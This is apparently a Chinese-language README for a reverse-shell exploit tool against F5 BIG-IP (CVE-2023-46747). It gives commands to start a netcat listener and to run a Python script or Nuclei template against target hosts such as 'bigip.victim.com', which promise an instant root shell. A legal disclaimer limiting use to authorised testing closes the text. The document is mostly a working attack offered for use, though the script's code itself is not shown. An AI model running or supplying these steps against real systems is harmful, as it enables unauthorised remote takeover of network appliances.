
Python3 与 Nuclei 版本 – 作者 raguraman
关键的未经验证 RCE(CVSS 9.8),通过 AJP + HTTP 请求走私实现
适用于所有未打补丁的 BIG-IP 13.x → 17.x(包括最新版 17.1.0.3)
补丁:https://my.f5.com/manage/s/article/K000137353(2023年11月)
真实世界漏洞利用文章: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → 独立 Python3 脚本(推荐)CVE-2023-46747-revshell.yaml → Nuclei 模板(可选)# 1. 启动监听器
nc -lvnp 4444
# 2. 运行漏洞利用(支持 IP 或域名)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → 即时获得 root Shell!
使用方法 – Nuclei 模板(备选)
Bash # 1. 在 YAML 文件中编辑 LHOST 和 LPORT
# 2. 启动监听器
nc -lvnp 4444
# 3. 扫描
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
# 法律警告
本工具仅用于授权的安全测试,例如:
经批准的渗透测试项目
具有书面授权的红队行动
受控实验室环境中的研究
请勿在您不拥有或未获得明确测试许可的系统上使用此漏洞利用工具。
未经授权的利用是非法的,可能导致刑事起诉。
使用本工具即表示您承担遵守适用法律的全部责任。
作者对任何误用或损害不承担任何责任。